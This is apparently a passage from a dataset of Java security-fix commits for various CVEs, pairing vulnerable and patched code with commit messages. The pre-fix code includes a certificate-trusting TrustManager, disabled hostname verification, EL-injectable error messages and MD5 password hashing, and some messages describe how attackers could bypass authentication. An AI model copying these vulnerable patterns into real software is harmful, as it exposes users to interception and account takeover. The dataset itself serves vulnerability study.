import org.aspectj.lang.annotation.Around;
import org.aspectj.lang.annotation.Aspect;
import org.aspectj.lang.annotation.Pointcut;
import org.dpppt.backend.sdk.ws.radarcovid.annotation.ResponseRetention;
import org.dpppt.backend.sdk.ws.radarcovid.exception.RadarCovidServerException;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.autoconfigure.condition.ConditionalOnProperty;
import org.springframework.context.annotation.Configuration;
import org.springframework.core.env.Environment;
import org.springframework.http.HttpStatus;
import org.springframework.stereotype.Component;
/**
 * Aspect in charge of controlling the minimum response time of a service.
 */
@Configuration
@ConditionalOnProperty(name = "application.response.retention.enabled", havingValue = "true", matchIfMissing = true)
public class ResponseRetentionAspectConfiguration {
	private static final Logger log = LoggerFactory.getLogger("org.dpppt.backend.sdk.ws.radarcovid.annotation.ResponseRetention");
	@Autowired
	private Environment environment;
    @Aspect
    @Component
    public class ControllerTimeResponseControlAspect {
        @Pointcut("@annotation(responseRetention)")
        public void annotationPointCutDefinition(ResponseRetention responseRetention){
        }
		@Around("execution(@org.dpppt.backend.sdk.ws.radarcovid.annotation.ResponseRetention * *..controller..*(..)) &amp;&amp; annotationPointCutDefinition(responseRetention)")
        public Object logAround(ProceedingJoinPoint joinPoint, ResponseRetention responseRetention) throws Throwable {
        	log.debug("************************* INIT TIME RESPONSE CONTROL *********************************");
            long start = System.currentTimeMillis();
            try {
                String className = joinPoint.getSignature().getDeclaringTypeName();
                String methodName = joinPoint.getSignature().getName();
                Object result = joinPoint.proceed();
                long elapsedTime = System.currentTimeMillis() - start;
                long responseRetentionTimeMillis = getTimeMillis(responseRetention.time());
                log.debug("Controller : Controller {}.{} () execution time : {} ms", className, methodName, elapsedTime);
                if (elapsedTime &lt; responseRetentionTimeMillis) {
                	Thread.sleep(responseRetentionTimeMillis - elapsedTime);
                }
                elapsedTime = System.currentTimeMillis() - start;
                log.debug("Controller : Controller {}.{} () NEW execution time : {} ms", className, methodName, elapsedTime);
                log.debug("************************* END TIME RESPONSE CONTROL **********************************");
                return result;
            } catch (IllegalArgumentException e) {
				log.error("Controller : Illegal argument {} in {} ()", Arrays.toString(joinPoint.getArgs()),
						joinPoint.getSignature().getName());
				log.debug("************************* END TIME RESPONSE CONTROL **********************************");
                throw e;
            }
        }
		private long getTimeMillis(String timeMillisString) {
			String stringValue = environment.getProperty(timeMillisString);
			if (NumberUtils.isCreatable(stringValue)) {
				return Long.parseLong(stringValue);
			} else {
				throw new RadarCovidServerException(HttpStatus.INTERNAL_SERVER_ERROR,
						"Invalid timeMillisString value \"" + timeMillisString + "\" - not found or cannot parse into long");
			}
		}
    }
}
</t>
  </si>
  <si>
    <t>RadarCovidServerException.java</t>
  </si>
  <si>
    <t xml:space="preserve">/*
 * Copyright (c) 2020 Gobierno de España
 *
 * This Source Code Form is subject to the terms of the Mozilla Public
 * License, v. 2.0. If a copy of the MPL was not distributed with this
 * file, You can obtain one at http://mozilla.org/MPL/2.0/.
 *
 * SPDX-License-Identifier: MPL-2.0
 */
package org.dpppt.backend.sdk.ws.radarcovid.exception;
import org.springframework.http.HttpStatus;
public class RadarCovidServerException extends RuntimeException {
    private final HttpStatus httpStatus;
    /**
     * The Constructor for the Exception class.
     *
     * @param httpStatus the state of the server
     * @param message    the message
     */
    public RadarCovidServerException(HttpStatus httpStatus, String message) {
        super(message);
        this.httpStatus = httpStatus;
    }
	public HttpStatus getHttpStatus() {
		return httpStatus;
	}
}
</t>
  </si>
  <si>
    <t>CVE-2020-26234</t>
  </si>
  <si>
    <t>https://github.com/opencast/opencast/commit/4225bf90af74557deaf8fb6b80b0705c9621acfc</t>
  </si>
  <si>
    <t>HttpClientImpl.java</t>
  </si>
  <si>
    <t>4225bf90af74557deaf8fb6b80b0705c9621acfc</t>
  </si>
  <si>
    <t xml:space="preserve">import org.apache.http.conn.scheme.Scheme;
import org.apache.http.conn.scheme.SchemeRegistry;
import org.apache.http.conn.ssl.SSLSocketFactory;
import org.apache.http.conn.ssl.X509HostnameVerifier;
import java.security.KeyManagementException;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLException;
import javax.net.ssl.SSLSession;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
  private DefaultHttpClient defaultHttpClient = makeHttpClient();
  /**
   * Creates a new client that can deal with all kinds of oddities with regards to http/https connections.
   *
   * @return the client
   */
  private DefaultHttpClient makeHttpClient() {
    DefaultHttpClient defaultHttpClient = new DefaultHttpClient();
    try {
      logger.debug("Installing forgiving hostname verifier and trust managers");
      X509TrustManager trustManager = createTrustManager();
      X509HostnameVerifier hostNameVerifier = createHostNameVerifier();
      SSLContext sslContext = SSLContext.getInstance("TLS");
      sslContext.init(null, new TrustManager[] { trustManager }, new SecureRandom());
      SSLSocketFactory ssf = new SSLSocketFactory(sslContext, hostNameVerifier);
      ClientConnectionManager ccm = defaultHttpClient.getConnectionManager();
      SchemeRegistry sr = ccm.getSchemeRegistry();
      sr.register(new Scheme("https", 443, ssf));
    } catch (NoSuchAlgorithmException e) {
      logger.error("Error creating context to handle TLS connections: {}", e.getMessage());
    } catch (KeyManagementException e) {
      logger.error("Error creating context to handle TLS connections: {}", e.getMessage());
    }
    return defaultHttpClient;
  }
  /**
   * Returns a new trust manager which will be in charge of checking the SSL certificates that are being presented by
   * SSL enabled hosts.
   *
   * @return the trust manager
   */
  private X509TrustManager createTrustManager() {
    X509TrustManager trustManager = new X509TrustManager() {
      /**
       * {@InheritDoc}
       *
       * @see javax.net.ssl.X509TrustManager#checkClientTrusted(java.security.cert.X509Certificate[], java.lang.String)
       */
      public void checkClientTrusted(X509Certificate[] xcs, String string) throws CertificateException {
        logger.trace("Skipping trust check on client certificate {}", string);
      }
      /**
       * {@InheritDoc}
       *
       * @see javax.net.ssl.X509TrustManager#checkServerTrusted(java.security.cert.X509Certificate[], java.lang.String)
       */
      public void checkServerTrusted(X509Certificate[] xcs, String string) throws CertificateException {
        logger.trace("Skipping trust check on server certificate {}", string);
      }
      /**
       * {@InheritDoc}
       *
       * @see javax.net.ssl.X509TrustManager#getAcceptedIssuers()
       */
      public X509Certificate[] getAcceptedIssuers() {
        logger.trace("Returning empty list of accepted issuers");
        return null;
      }
    };
    return trustManager;
  }
  /**
   * Creates a host name verifier that will make sure the SSL host's name matches the name in the SSL certificate.
   *
   * @return the host name verifier
   */
  private X509HostnameVerifier createHostNameVerifier() {
    X509HostnameVerifier verifier = new X509HostnameVerifier() {
      /**
       * {@InheritDoc}
       *
       * @see org.apache.http.conn.ssl.X509HostnameVerifier#verify(java.lang.String, javax.net.ssl.SSLSocket)
       */
      public void verify(String host, SSLSocket ssl) throws IOException {
        logger.trace("Skipping SSL host name check on {}", host);
      }
      /**
       * {@InheritDoc}
       *
       * @see org.apache.http.conn.ssl.X509HostnameVerifier#verify(java.lang.String, java.security.cert.X509Certificate)
       */
      public void verify(String host, X509Certificate xc) throws SSLException {
        logger.trace("Skipping X509 certificate host name check on {}", host);
      }
      /**
       * {@InheritDoc}
       *
       * @see org.apache.http.conn.ssl.X509HostnameVerifier#verify(java.lang.String, java.lang.String[],
       *      java.lang.String[])
       */
      public void verify(String host, String[] cns, String[] subjectAlts) throws SSLException {
        logger.trace("Skipping DNS host name check on {}", host);
      }
      /**
       * {@InheritDoc}
       *
       * @see javax.net.ssl.HostnameVerifier#verify(java.lang.String, javax.net.ssl.SSLSession)
       */
      public boolean verify(String host, SSLSession ssl) {
        logger.trace("Skipping SSL session host name check on {}", host);
        return true;
      }
    };
    return verifier;
  }
</t>
  </si>
  <si>
    <t xml:space="preserve">  private DefaultHttpClient defaultHttpClient = new DefaultHttpClient();
</t>
  </si>
  <si>
    <t>Re-Enable Hostname VerificationThis patch is a minimal change to re-enable HTTPS hostname verification
of Opencast's HTTP client used for a large portion its HTTP requests.
Hostname verification is an important part when using HTTPS to ensure
that the presented certificate is valid for the host. Disabling it can
allow for man-in-the-middle attacks.</t>
  </si>
  <si>
    <t>CVE-2020-26247</t>
  </si>
  <si>
    <t>https://github.com/sparklemotion/nokogiri/commit/9c87439d9afa14a365ff13e73adc809cb2c3d97b</t>
  </si>
  <si>
    <t>XmlRelaxng.java</t>
  </si>
  <si>
    <t>9c87439d9afa14a365ff13e73adc809cb2c3d97b</t>
  </si>
  <si>
    <t xml:space="preserve">    static XmlSchema createSchemaInstance(ThreadContext context, RubyClass klazz, Source source) {
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.jruby.runtime.builtin.IRubyObject;
    static XmlSchema createSchemaInstance(ThreadContext context, RubyClass klazz, Source source, IRubyObject parseOptions) {
        if (parseOptions == null) {
            parseOptions = defaultParseOptions(context.getRuntime());
        }
        xmlRelaxng.setInstanceVariable("@parse_options", parseOptions);
</t>
  </si>
  <si>
    <t>feat: XML::Schema and RelaxNG creation accept optional ParseOptionsI'm trying out a new pattern, which is that the parsed object carries
around the ParseOptions it was created with, which should make some
testing a bit easier.
I'm also not implementing the "config block" pattern in use for
Documents, because I think the UX is weird and I'm hoping to change
everything to use kwargs in a 2.0 release, anyway.</t>
  </si>
  <si>
    <t>XmlSchema.java</t>
  </si>
  <si>
    <t xml:space="preserve">    static XmlSchema createSchemaInstance(ThreadContext context, RubyClass klazz, Source source) {
    @JRubyMethod(meta=true)
    public static IRubyObject from_document(ThreadContext context, IRubyObject klazz, IRubyObject document) {
        return getSchema(context, (RubyClass)klazz, source);
    private static IRubyObject getSchema(ThreadContext context, RubyClass klazz, Source source) {
            return XmlSchema.createSchemaInstance(context, klazz, source);
            return XmlRelaxng.createSchemaInstance(context, klazz, source);
    @JRubyMethod(meta=true)
    public static IRubyObject read_memory(ThreadContext context, IRubyObject klazz, IRubyObject content) {
        String data = content.convertToString().asJavaString();
        return getSchema(context, (RubyClass) klazz, new StreamSource(new StringReader(data)));
    }
</t>
  </si>
  <si>
    <t xml:space="preserve">    static XmlSchema createSchemaInstance(ThreadContext context, RubyClass klazz, Source source, IRubyObject parseOptions) {
        if (parseOptions == null) {
            parseOptions = defaultParseOptions(context.getRuntime());
        }
        xmlSchema.setInstanceVariable("@parse_options", parseOptions);
    protected static IRubyObject defaultParseOptions(Ruby runtime) {
        return ((RubyClass)runtime.getClassFromPath("Nokogiri::XML::ParseOptions")).getConstant("DEFAULT_SCHEMA");
    }
    @JRubyMethod(meta=true, required=1, optional=1)
    public static IRubyObject from_document(ThreadContext context, IRubyObject klazz, IRubyObject[] args) {
        IRubyObject document = args[0];
        IRubyObject parseOptions = null;
        if (args.length &gt; 1) {
            parseOptions = args[1];
        }
        return getSchema(context, (RubyClass)klazz, source, parseOptions);
    @JRubyMethod(meta=true, required=1, optional=1)
    public static IRubyObject read_memory(ThreadContext context, IRubyObject klazz, IRubyObject[] args) {
        IRubyObject content = args[0];
        IRubyObject parseOptions = null;
        if (args.length &gt; 1) {
            parseOptions = args[1];
        }
        String data = content.convertToString().asJavaString();
        return getSchema(context, (RubyClass) klazz, new StreamSource(new StringReader(data)), parseOptions);
    }
    private static IRubyObject getSchema(ThreadContext context, RubyClass klazz, Source source, IRubyObject parseOptions) {
            return XmlSchema.createSchemaInstance(context, klazz, source, parseOptions);
            return XmlRelaxng.createSchemaInstance(context, klazz, source, parseOptions);
</t>
  </si>
  <si>
    <t>CVE-2020-26282</t>
  </si>
  <si>
    <t>https://github.com/browserup/browserup-proxy/commit/4b38e7a3e20917e5c3329d0d4e9590bed9d578ab</t>
  </si>
  <si>
    <t>LongPositiveConstraint.java</t>
  </si>
  <si>
    <t>4b38e7a3e20917e5c3329d0d4e9590bed9d578ab</t>
  </si>
  <si>
    <t xml:space="preserve">        errorMessage = String.format("Invalid integer value: '%s'", value);
        errorMessage = String.format("Expected positive integer value, got: '%s'", value);
}
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.browserup.bup.rest.validation.util.MessageSanitizer;
        String escapedValue = MessageSanitizer.escape(value);
        errorMessage = String.format("Invalid integer value: '%s'", escapedValue);
        String escapedValue = MessageSanitizer.escape(value);
        errorMessage = String.format("Expected positive integer value, got: '%s'", escapedValue);
}
</t>
  </si>
  <si>
    <t>Fix Critical Java EL Injection RCE vulnerability from GHSL-2020-213</t>
  </si>
  <si>
    <t>NotBlankConstraint.java</t>
  </si>
  <si>
    <t xml:space="preserve">      String errorMessage = String.format("Expected not empty value, got '%s'", value);
}
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.browserup.bup.rest.validation.util.MessageSanitizer;
      String escapedValue = MessageSanitizer.escape(value == null ? null : value.toString());
      String errorMessage = String.format("Expected not empty value, got '%s'", escapedValue);
}
</t>
  </si>
  <si>
    <t>PatternConstraint.java</t>
  </si>
  <si>
    <t xml:space="preserve">        String errorMessage = String.format("URL parameter '%s' is not a valid regexp", value);
}
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.browserup.bup.rest.validation.util.MessageSanitizer;
        String escapedValue = MessageSanitizer.escape(value);
        String errorMessage = String.format("URL parameter '%s' is not a valid regexp", escapedValue);
}
</t>
  </si>
  <si>
    <t>PortWithExistingProxyConstraint.java</t>
  </si>
  <si>
    <t xml:space="preserve">      String errorMessage = String.format("No proxy server found for specified port %d", value);
}
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.browserup.bup.rest.validation.util.MessageSanitizer;
      String escapedValue = MessageSanitizer.escape(value.toString());
      String errorMessage = String.format("No proxy server found for specified port %s", escapedValue);
}
</t>
  </si>
  <si>
    <t>MessageSanitizer.java</t>
  </si>
  <si>
    <t xml:space="preserve">package com.browserup.bup.rest.validation.util;
/*
 * Modifications Copyright (c) 2019 BrowserUp, Inc.
 * Original from:
 * https://github.com/hibernate/hibernate-validator/blob/master/engine/src/main/java/org/hibernate/validator/internal/engine/messageinterpolation/util/InterpolationHelper.java
 */
/*
 * License: Apache License, Version 2.0
 * See the license file in the root directory or &lt;http://www.apache.org/licenses/LICENSE-2.0&gt;.
 */
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class MessageSanitizer {
  public static final char BEGIN_CHAR = '{';
  public static final char END_CHAR = '}';
  public static final char EL_DESIGNATOR = '$';
  public static final char ESCAPE_CHARACTER = '\\';
  private static final Pattern ESCAPE_PATTERN = Pattern.compile( "([\\" + ESCAPE_CHARACTER + BEGIN_CHAR + END_CHAR + EL_DESIGNATOR + "])" );
  private MessageSanitizer() {
  }
  public static String escape(String message) {
    if ( message == null ) {
      return null;
    }
    return ESCAPE_PATTERN.matcher( message ).replaceAll( Matcher.quoteReplacement( String.valueOf( ESCAPE_CHARACTER ) ) + "$1" );
  }
}
</t>
  </si>
  <si>
    <t>CVE-2020-28371</t>
  </si>
  <si>
    <t>https://github.com/ReadyTalk/avian/commit/0871979b298add320ca63f65060acb7532c8a0dd</t>
  </si>
  <si>
    <t>FileOutputStream.java</t>
  </si>
  <si>
    <t>0871979b298add320ca63f65060acb7532c8a0dd</t>
  </si>
  <si>
    <t xml:space="preserve">    if (offset &lt; 0 || offset + length &gt; b.length) {
</t>
  </si>
  <si>
    <t xml:space="preserve">    if (offset &lt; 0 || length &lt; 0 || length &gt; b.length || offset &gt; b.length - length) {
</t>
  </si>
  <si>
    <t>Fix integer overflow leading to out-of-bounds read/write</t>
  </si>
  <si>
    <t>CVE-2020-35460</t>
  </si>
  <si>
    <t>https://github.com/joniles/mpxj/commit/8eaf4225048ea5ba7e59ef4556dab2098fcc4a1d</t>
  </si>
  <si>
    <t>InputStreamHelper.java</t>
  </si>
  <si>
    <t>8eaf4225048ea5ba7e59ef4556dab2098fcc4a1d</t>
  </si>
  <si>
    <t xml:space="preserve">      String canonicalDestinationDirPath = dir.getCanonicalPath();
         // https://snyk.io/research/zip-slip-vulnerability
         String canonicalDestinationFile = file.getCanonicalPath();
         if (!canonicalDestinationFile.startsWith(canonicalDestinationDirPath + File.separator))
         {
            throw new IOException("Entry is outside of the target dir: " + entry.getName());
         }
</t>
  </si>
  <si>
    <t>zip slip fix</t>
  </si>
  <si>
    <t>CVE-2020-4070</t>
  </si>
  <si>
    <t>https://github.com/w3c/css-validator/commit/e5c09a9119167d3064db786d5f00d730b584a53b</t>
  </si>
  <si>
    <t>StyleSheetParser.java</t>
  </si>
  <si>
    <t>e5c09a9119167d3064db786d5f00d730b584a53b</t>
  </si>
  <si>
    <t xml:space="preserve">                    -1, e));
</t>
  </si>
  <si>
    <t xml:space="preserve">                    -1, new Exception(Messages.escapeString(e.getMessage()))));
</t>
  </si>
  <si>
    <t>escape also the throwable message, see #278</t>
  </si>
  <si>
    <t>CVE-2020-5206</t>
  </si>
  <si>
    <t>https://github.com/opencast/opencast/commit/b157e1fb3b35991ca7bf59f0730329fbe7ce82e8</t>
  </si>
  <si>
    <t>SecurityServiceSpringImpl.java</t>
  </si>
  <si>
    <t>b157e1fb3b35991ca7bf59f0730329fbe7ce82e8</t>
  </si>
  <si>
    <t xml:space="preserve">    Authentication auth = SecurityContextHolder.getContext().getAuthentication();
      if ((principal != null) &amp;&amp; (principal instanceof UserDetails)) {
            logger.debug(
                    "Authenticated user '{}' could not be found in any of the current UserProviders. Continuing anyway...",
                    userDetails.getUsername());
        Set&lt;JaxbRole&gt; roles = new HashSet&lt;JaxbRole&gt;();
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.springframework.security.authentication.AnonymousAuthenticationToken;
    Authentication auth = SecurityContextHolder.getContext().getAuthentication();
    if (auth instanceof AnonymousAuthenticationToken) {
      return SecurityUtil.createAnonymousUser(org);
    }
      if ((principal instanceof UserDetails)) {
            logger.debug("Authenticated user '{}' could not be found in any of the current UserProviders. "
                + "Continuing anyway...", userDetails.getUsername());
        Set&lt;JaxbRole&gt; roles = new HashSet&lt;&gt;();
</t>
  </si>
  <si>
    <t>Authentication Bypass For Endpoints With Anonymous AccessUsing a remember-me cookie with an arbitrary username can cause Opencast
to assume proper authentication for that user even if the remember-me
cookie was incorrect given that the attacked endpoint also allows
anonymous access.
This way, an attacker can, for example, fake a remember-me token, assume
the identity of the global system administrator and request non-public
content from the search service without ever providing any proper
authentication.
The reason for this problem is that using a remember-me cookie will
always cause the user in the request context to be populated, even if
the cookie is invalid by now. This is usually no problem, except in
combination with anonymous access where anonymous authentication is
granted and the request may continue.
In such a case, Opencast's security service would just check that a user
existed in the request context and assume proper authentication of this
user, never checking if it's actually anonymous authentication.
This patch adds this additional check, falling back to the anonymous
user in case of anonymous authentication.</t>
  </si>
  <si>
    <t>CVE-2020-5222</t>
  </si>
  <si>
    <t>https://github.com/opencast/opencast/commit/1a7172c95af8d542a77ae5b153e4c834dd4788a6</t>
  </si>
  <si>
    <t>SystemTokenBasedRememberMeService.java</t>
  </si>
  <si>
    <t>1a7172c95af8d542a77ae5b153e4c834dd4788a6</t>
  </si>
  <si>
    <t xml:space="preserve">/**
 * Licensed to The Apereo Foundation under one or more contributor license
 * agreements. See the NOTICE file distributed with this work for additional
 * information regarding copyright ownership.
 *
 *
 * The Apereo Foundation licenses this file to you under the Educational
 * Community License, Version 2.0 (the "License"); you may not use this file
 * except in compliance with the License. You may obtain a copy of the License
 * at:
 *
 *   http://opensource.org/licenses/ecl2.txt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under
 * the License.
 *
 */
package org.opencastproject.kernel.security;
import org.apache.commons.io.IOUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.security.core.userdetails.UserDetailsService;
import org.springframework.security.crypto.codec.Hex;
import org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.InetAddress;
import java.net.UnknownHostException;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;
import java.util.Objects;
/**
 * This implements a zero-configuration version Spring Security's token based remember-me service. While the key can
 * still be augmented by configuration, it is generally generated based on seldom changing but unique system
 * properties like hostname, IP address, file system information and Linux kernel.
 */
public class SystemTokenBasedRememberMeService extends TokenBasedRememberMeServices {
  private Logger logger = LoggerFactory.getLogger(SystemTokenBasedRememberMeService.class);
  private String key;
  @Deprecated
  public SystemTokenBasedRememberMeService() {
    super();
    setKey(null);
  }
  public SystemTokenBasedRememberMeService(String key, UserDetailsService userDetailsService) {
    super(key, userDetailsService);
    setKey(key);
  }
  /**
   * Set a new key to be used when generating remember-me tokens.
   *
   * Note that the key passed to this method will be augmented by seldom changing but generally unique system
   * properties like hostname, IP address, file system information and Linux kernel. Hence, even setting no custom
   * key should be save.
   */
  @Override
  public void setKey(String key) {
    // Start with a user key if provided
    StringBuilder keyBuilder = new StringBuilder(Objects.toString(key, ""));
    // This will give us the hostname and IP address as something which should be unique per system.
    // For example: lk.elan-ev.de/10.10.10.31
    try {
      keyBuilder.append(InetAddress.getLocalHost());
    } catch (UnknownHostException e) {
      // silently ignore this
    }
    // Gather additional system properties as key
    // This requires a proc-fs which should generally be available under Linux.
    // But even without, we have fallbacks above and below.
    for (String procFile: Arrays.asList("/proc/version", "/proc/partitions")) {
      try (FileInputStream fileInputStream = new FileInputStream(new File(procFile))) {
        keyBuilder.append(IOUtils.toString(fileInputStream, StandardCharsets.UTF_8));
      } catch (IOException e) {
        // ignore this
      }
    }
    // If we still have no proper key, just generate a random one.
    // This will work just fine with the single drawback that restarting Opencast invalidates all remember-me tokens.
    // But it should be a sufficiently good fallback.
    key = keyBuilder.toString();
    if (key.isEmpty()) {
      logger.warn("Could not generate semi-persistent remember-me key. Will generate a non-persistent random one.");
      key = Double.toString(Math.random());
    }
    logger.debug("Remember me key before hashing: {}", key);
    // Use a SHA-512 hash as key to have a more sane key.
    try {
      MessageDigest digest = MessageDigest.getInstance("SHA-512");
      key = new String(Hex.encode(digest.digest(key.getBytes())));
    } catch (NoSuchAlgorithmException e) {
      logger.warn("No SHA-512 algorithm available!");
    }
    logger.debug("Calculated remember me key: {}", key);
    this.key = key;
    super.setKey(key);
  }
  @Override
  public String getKey() {
    return this.key;
  }
  /**
   * Calculates the digital signature to be put in the cookie. Default value is
   * SHA-512 ("username:tokenExpiryTime:password:key")
   */
  @Override
  protected String makeTokenSignature(long tokenExpiryTime, String username, String password) {
    String data = username + ":" + tokenExpiryTime + ":" + password + ":" + getKey();
    MessageDigest digest;
    try {
      digest = MessageDigest.getInstance("SHA-512");
    } catch (NoSuchAlgorithmException e) {
      throw new IllegalStateException("No SHA-512 algorithm available!");
    }
    return new String(Hex.encode(digest.digest(data.getBytes())));
  }
}
</t>
  </si>
  <si>
    <t>Fix Remember-Me CookieThe security configuration in etc/security/mh_default_org.xml enables a
remember-me cookie based on a hash created from the username, password,
and an additional system key. Opencast has hard-coded this system key in
the large XML file and never mentions to change this, basically ensuring
that all systems use the same key:
    &lt;sec:remember-me key="opencast" user-service-ref="userDetailsService" /&gt;
This means that an attacker getting access to a remember-me token for
one server can get access to all servers which allow log-in using the
same credentials without ever needing the credentials. For example, a
remember-me token obtained from develop.opencast.org can be used on
stable.opencast.org without actually knowing the log-in credentials.
Such an attack will usually not work on different installations –
assuming that safe, unique passwords are used – but it is basically
guaranteed to work to get access to all machines of one cluster if a
token from one machine is compromised.
This patch now makes Opencast automatically generate a safe key based on
unique system properties, creating a safe, zero-configuration variant of
the remember-me token.
This patch additionally switches from using MD5 for the tokens to using
SHA-512 instead to also be more resilient against brute-force attacks in
case an attacker gets access to such a token.</t>
  </si>
  <si>
    <t>CVE-2020-5229</t>
  </si>
  <si>
    <t>https://github.com/opencast/opencast/commit/32bfbe5f78e214e2d589f92050228b91d704758e</t>
  </si>
  <si>
    <t>JpaUser.java</t>
  </si>
  <si>
    <t>32bfbe5f78e214e2d589f92050228b91d704758e</t>
  </si>
  <si>
    <t xml:space="preserve">  @NamedQuery(name = "User.findInsecureHash",
              query = "select u from JpaUser u where length(u.password) = 32 and u.organization.id = :org"),
</t>
  </si>
  <si>
    <t>Replace MD5 with bcrypt for password hashingUser passwords are stored in the database using the rather outdated and
cryptographically insecure MD5 hash algorithm. Furthermore, the hashes
are salted using the username instead of a random salt, causing hashes
for users with the same username and password to collide which is
problematic especially for popular users like the default admin user.
This essentially means that for an attacker, it might be feasible to
reconstruct a user's password given access to these hashes.
Note that attackers needing access to the hashes means that they must
gain access to the database in which these are stored first to be able
to start cracking the passwords.
Patches
The patch makes Opencast now uses the modern and much stronger bcrypt
password hashing algorithm for storing passwords.  Note, that old hashes
remain MD5 until the password is updated.
For a list of users whose password hashes are stored using MD5, the REST endpoint `/user-utils/users/md5.json` is added.</t>
  </si>
  <si>
    <t>CustomPasswordEncoder.java</t>
  </si>
  <si>
    <t xml:space="preserve">/**
 * Licensed to The Apereo Foundation under one or more contributor license
 * agreements. See the NOTICE file distributed with this work for additional
 * information regarding copyright ownership.
 *
 *
 * The Apereo Foundation licenses this file to you under the Educational
 * Community License, Version 2.0 (the "License"); you may not use this file
 * except in compliance with the License. You may obtain a copy of the License
 * at:
 *
 *   http://opensource.org/licenses/ecl2.txt
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.  See the
 * License for the specific language governing permissions and limitations under
 * the License.
 *
 */
package org.opencastproject.kernel.security;
import org.apache.commons.codec.digest.DigestUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.security.authentication.encoding.PasswordEncoder;
import org.springframework.security.crypto.bcrypt.BCrypt;
/**
 *
 */
public class CustomPasswordEncoder implements PasswordEncoder {
  private Logger logger = LoggerFactory.getLogger(CustomPasswordEncoder.class);
  /**
   * Encode the raw password for storage using BCrypt.
   * @param rawPassword raw password to encrypt/hash
   * @return hashed password
   */
  public String encodePassword(final String rawPassword) {
    return encodePassword(rawPassword, null);
  }
  /**
   * Encode the raw password for storage using BCrypt.
   * @param rawPassword raw password to encrypt/hash
   * @param ignored This parameter will not be used. A random salt is generated by BCrypt.
   * @return hashed password
   */
  @Override
  public String encodePassword(final String rawPassword, final Object ignored) {
    return BCrypt.hashpw(rawPassword, BCrypt.gensalt());
  }
  /**
   * Verify the encoded password obtained from storage matches the submitted raw
   * password after it too is encoded. Returns true if the passwords match, false if
   * they do not. The stored password itself is never decoded.
   *
   * @param rawPassword the raw password to encode and match
   * @param encodedPassword the encoded password from storage to compare with
   * @return true if the raw password, after encoding, matches the encoded password from storage
   */
  @Override
  public boolean isPasswordValid(String encodedPassword, String rawPassword, Object salt) {
    // Test MD5 encoded hash
    if (encodedPassword.length() == 32) {
      final String hash = md5Encode(rawPassword, salt);
      logger.debug("Checking md5 hashed password '{}' against encoded password '{}'", hash, encodedPassword);
      return hash.equals(encodedPassword);
    }
    // Test BCrypt encoded hash
    logger.debug("Verifying BCrypt hash {}", encodedPassword);
    return BCrypt.checkpw(rawPassword, encodedPassword);
  }
  /**
   * Encode a clear text password using Opencast's legacy MD5 based hashing with salt.
   * The username was used as salt for this.
   *
   * @param clearText
   *          the password
   * @param salt
   *          the salt
   * @return the hashed password
   * @throws IllegalArgumentException
   *           if clearText or salt are null
   */
  public static String md5Encode(String clearText, Object salt) throws IllegalArgumentException {
    if (clearText == null || salt == null)
      throw new IllegalArgumentException("clearText and salt must not be null");
    return DigestUtils.md5Hex(clearText + "{" + salt.toString() + "}");
  }
}
</t>
  </si>
  <si>
    <t>JpaUserAndRoleProvider.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.opencastproject.util.PasswordEncoder;
    String encodedPassword = PasswordEncoder.encode(user.getPassword(), user.getUsername());
      encodedPassword = PasswordEncoder.encode(user.getPassword(), user.getUsername());
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.opencastproject.kernel.security.CustomPasswordEncoder;
import javax.persistence.TypedQuery;
  /** Password encoder for storing user passwords */
  private CustomPasswordEncoder passwordEncoder = new CustomPasswordEncoder();
  /**
   * List all users with insecure password hashes
   */
  public List&lt;User&gt; findInsecurePasswordHashes() {
    final String orgId = securityService.getOrganization().getId();
    EntityManager em = null;
    try {
      em = emf.createEntityManager();
      TypedQuery&lt;User&gt; q = em.createNamedQuery("User.findInsecureHash", User.class);
      q.setParameter("org", orgId);
      return q.getResultList();
    } finally {
      if (em != null)
        em.close();
    }
  }
    addUser(user, false);
  }
  /**
   * Adds a user to the persistence
   *
   * @param user
   *          the user to add
   * @param passwordEncoded
   *          if the password is already encoded or should be encoded
   *
   * @throws org.opencastproject.security.api.UnauthorizedException
   *          if the user is not allowed to create other user with the given roles
   */
  public void addUser(JpaUser user, final boolean passwordEncoded) throws UnauthorizedException {
    String encodedPassword = passwordEncoded ? user.getPassword() : passwordEncoder.encodePassword(user.getPassword());
    return updateUser(user, false);
  }
  /**
   * Updates a user to the persistence
   *
   * @param user
   *          the user to save
   * @param passwordEncoded
   *          if the password is already encoded or should be encoded
   * @throws NotFoundException
   * @throws org.opencastproject.security.api.UnauthorizedException
   *          if the current user is not allowed to update user with the given roles
   */
  public User updateUser(JpaUser user, final boolean passwordEncoded) throws NotFoundException, UnauthorizedException {
      if (passwordEncoded) {
        encodedPassword = user.getPassword();
      } else {
        encodedPassword = passwordEncoder.encodePassword(user.getPassword());
      }
</t>
  </si>
  <si>
    <t>UserEndpoint.java</t>
  </si>
  <si>
    <t xml:space="preserve">  @GET
  @Path("users/md5.json")
  @Produces(MediaType.APPLICATION_JSON)
  @RestQuery(
      name = "users-with-insecure-hashing",
      description = "Returns a list of users which passwords are stored using MD5 hashes",
      returnDescription = "Returns a JSON representation of the list of matching user accounts",
      reponses = {
      @RestResponse(
          responseCode = SC_OK,
          description = "The user accounts.")
  })
